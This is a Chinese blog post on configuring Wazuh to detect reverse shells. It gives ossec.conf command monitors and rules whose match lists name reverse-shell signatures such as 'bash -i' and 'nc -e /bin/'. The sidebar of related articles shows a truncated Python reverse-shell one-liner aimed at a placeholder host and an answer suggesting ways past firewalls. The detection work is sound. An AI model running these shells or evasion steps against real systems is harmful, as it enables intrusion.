Wazuh检测反弹shell

最新推荐文章于 2024-06-23 21:00:00 发布
最新推荐文章于 2024-06-23 21:00:00 发布
阅读量1.8k 收藏 3
点赞数 3
分类专栏: Wazuh 文章标签: wazuh 反弹 shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gehongzhou/article/details/103126578
版权

Wazuh通过在agent服务器上执行指定的命令,并收集命令结果,可以在一定程度上发现反弹shell的入侵行为。

目前有2中常见的检测方法,一种是通过netstat输出网络连接中的shell进程来识别,另一种是通过ps输出进程信息中的反弹shell命令特征来识别。

1. 在agent的/var/ossec/etc/ossec.conf文件末尾增加自定义的命令,并重启

<ossec_config>
  <localfile>
    <log_format>command</log_format>
    <command>ps -eo user,pid,cmd</command>
    <frequency>60</frequency>
  </localfile>

  <localfile>
    <log_format>command</log_format>
    <command>netstat -anptl</command>
    <frequency>60</frequency>
  </localfile>
</ossec_config>

2. 在wazuh-manager端修改/var/ossec/etc/rules/local_rules.xml,增加自定义规则,并重启

<group name="ossec,">

  <rule id="100050" level="0">
    <if_sid>530</if_sid>
    <match>^ossec: output: 'ps -eo user,pid,cmd'</match>
    <description>List of running process.</description>
    <group>process_monitor,</group>
  </rule>
  <rule id="100051" level="15">
    <if_sid>100050</if_sid>
    <match>bash -i|dash -i|sh -i$|perl -e|perl -MIO -e|php -r|ruby -rsocket|xterm -display|Xnest |xhost |nc -e /bin/|lua -e require|python -c import socket|python -c import subprocess|python -c import os|python -c exec</match>
    <description>Reverse shell listening for incoming connections.</description>
    <group>process_monitor,attacks</group>
  </rule>

  <rule id="100052" level="0">
    <if_sid>530</if_sid>
    <match>^ossec: output: 'netstat -anptl'</match>
    <description>List of listening tcp ports.</description>
    <group>process_monitor,</group>
  </rule>
  <rule id="100053" level="0">
    <if_sid>100052</if_sid>
    <match>/bash|/dash|/sh|/nc</match>
    <description>Find shell processes that have open sockets.</description>
    <group>process_monitor,attacks</group>
  </rule>

</group>

 

3. 进行反弹shell,收到告警

IceRainow
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
hids wazuh 系列4-反弹shell规则
煜铭2011
01-19 2056
传统的入侵检测,主要分为网络入侵检测系统和主机入侵检测系统,分别作用于网络层面和主机(服务器、办公电脑等终端)。随着技术发展,出现了结合传统入侵检测系统和新技术(如数据分析、威胁情报、自动化操作、主动响应等)的新产品,这类新产品可能的名称是XDR、EDR、EPP等。Wazuh 是 以OSSEC作为引擎的基于主机的入侵检测系统,用于主机端点和云工作负载的统一XDR和SIEM保护。
linux反弹shell检测和溯源,Wazuh联动osquery检测linux反弹shell
weixin_39820136的博客
05-14 1136
用osquery根据制定的规则定时检测系统并生成包含查询结果的日志文件,wazuh再对这些日志文件进行解析之后匹配规则告警。osquery下载安装的过程就略过了。这里简单介绍下osquery,详细请参考官方文档文件结构/etc/osquery//usr/share/osquery/osquery.example.conf/usr/share/osquery/lenses/{*}.aug/usr/s...
自动化安全运营实操案例- 飞书 X Wazuh X 雷池WAF
最新发布
ZL_1618的博客
06-23 765
Wazuh| 一款国外的SIEM平台,可以理解为安全版的ELK,具有日志统计分析、可视化、主机监控等功能。目前github有9.2kstar,目前分为Saas版和开源版。Wazuh分为Server端以及Agent,Agent可以对服务器进行日志监控、漏洞检测、安全合规基线扫描、进程收集,集成VirusTotal接口后可具备磁盘恶意文件检测能力。本文中使用的是私有部署的开源版4.7.4,主要提供日志监控、下发指令自动处置的能力。—|—
Wazuh安装&功能测试——一篇到底
网安小白的博客
04-21 1845
Wazuh的下载安装&功能测试,一篇就够了~
BT利器之wazuh
求大佬师傅带
08-17 783
BT利器之wazuh
反弹shell
weixin_45605313的博客
06-02 166
反弹shellpythonphp python 弹出终端 python -c 'import pty; pty.spawn("/bin/bash")' python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(
ossec HIDS
05-19
OSSEC是一款开源的多平台的入侵检测系统,可以运行于Windows, Linux, OpenBSD/FreeBSD, 以及 MacOS等操作系统中。包括了日志分析,全面检测,root-kit检测。作为一款HIDS,OSSEC应该被安装在一台实施监控的系统中。另外有时候不需要安装完全版本得OSSEC,如果有多台电脑都安装了OSSEC,那么就可以采用客户端/服务器模式来运行。客户机通过客户端程序将数据发回到服务器端进行分析。在一台电脑上对多个系统进行监控对于企业或者家庭用户来说都是相当经济实用的。
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
wazuh-webshell检测规则
12-20
3. **命令行活动监测**:Webshell经常利用系统命令执行操作,Wazuh可以检测到异常的shell命令执行,如wget、curl下载可疑文件或执行非常规命令。 4. **字符串匹配**:Wazuh会检查日志中的字符串,如常见的Webshell...
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
为了更好地理解和掌握反弹shell,作者通过思维导图进行了框架整理,这有助于读者系统地了解各种反弹shell命令的原理、使用场景及检测方案。 4. **反弹姿势** 文档详细介绍了按照交互方式划分的五种类型的反弹...
wazuh-documentation:Wazuh-项目文档
02-03
Wazuh文档 Wazuh是一个免费的,开源的,可用于企业的安全监视解决方案,用于威胁检测,完整性监视,事件响应和合规性。 该资源库中提供了有关该项目的在线文档。 Wazuh团队的成员和社区用户为它的发展和日常改进做出了贡献。 在线文件 为这个项目做贡献 如果您想对本文档做出贡献,请阅读我们的文件,以了解有关如何部署开发环境和提交请求的更多信息。 您也可以通过发送电子邮件至wazuh+subscribe@googlegroups.com加入我们的,以提出问题并参与讨论。 使用的软件和库 3.5+ 3.0.4 0.9.2 1.1.13 版权和许可 版权所有:copyright:2020 Wazuh,Inc. Wazuh是免费软件; 您可以根据自由软件基金会发布的GNU通用公共许可证的条款重新分发和/或修改它; 许可的版本2,或(由您选择)任何更高的版本。
wazuh-ruleset:Wazuh-规则集
02-03
瓦祖规则集 该存储库处于只读模式,不再使用。 现在,所有与Wazuh规则集相关的内容都位于 。
PHP脚本反弹SHELL
10-20
此脚本可以反弹SHELL到指定地址,得到交互交shell
Wazuh从入门到上线
ordersyhack
02-02 1万+
Wazuh从入门到上线
Wazuh--一个完善的开源EDR产品
网络安全研究
09-11 9948
1. 简介 Wazuh由部署到受监视系统的端点安全代理和管理服务器组成,管理服务器收集和分析代理收集的数据。此外,Wazuh已与Elastic Stack完全集成,提供了搜索引擎和数据可视化工具,使用户可以浏览其安全警报。 Wazuh提供的功能包括日志数据分析,入侵和恶意软件检测,文件完整性监视,配置评估,漏洞检测以及对法规遵从性的支持。 github: https://github.com/wazuh 2. Wazuh平台的组件和体系结构 Wazuh平台主要包括三个主要组件,分别是Wazuh代理,Wazu
wazuh 日志收集原理分析
热门推荐
guoguangwu的专栏
11-05 1万+
wazuh 默认安装到 /var/ossec目录下。 我基于manager端进行分析,和agent一样。默认启动ossec-logcollector进程去搜集日志:比如 snort日志、auditd日志、syslog日志等。 入口函数代码在src/logcollector/main.c中。 int main(int argc, char **argv) { /* 初始化处理: 命...
网络安全--wazuh环境配置及漏洞复现
m0_68976043的博客
08-20 4094
1.1进入官网下载OVA启动软件1.2点击启动部署,傻瓜式操作1.3通过账号:wazuh-user,密码:wazuh进入wazuh1.4将桥接模式更改为仅nat模式1.5更改配置之后输入重新启动命令 service network restart查看自身ipip a1.6配置已好,本地开启小皮Apache直接访问1.7有时会因为网络问题出现如下问题,我们采用重启wazuh即可。
wazuh环境配置及漏洞复现
Mr_Rongyao的博客
08-23 186
Wazuh 是一个用于威胁预防、检测和响应的开源平台,它能够跨场所、虚拟化、容器化和基于云的环境保护工作负载。
反弹shell无法反弹
08-13
您好!关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或使用其他技术来绕过防火墙。 2. 端口未开放:如果目标主机的特定端口没有开放,那么反弹shell连接将无法建立。您可以通过扫描目标主机的端口来确定哪些端口是开放的,并调整反弹shell的配置以使用其中一个开放的端口。 3. 网络连接问题:有时候网络连接不稳定或存在其他问题,可能导致反弹shell无法成功。您可以尝试使用其他网络或通过网络工具进行连通性测试,以确保网络连接正常。 4. 权限问题:如果您没有足够的权限来执行反弹shell操作,那么它也可能失败。请确保您具有足够的权限,并尝试以管理员身份运行反弹shell。 请注意,反弹shell是一项潜在的非法活动,我们不鼓励或支持任何非法的行为。以上回答仅供技术讨论和参考,请在合法和合适的环境中使用这些知识。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值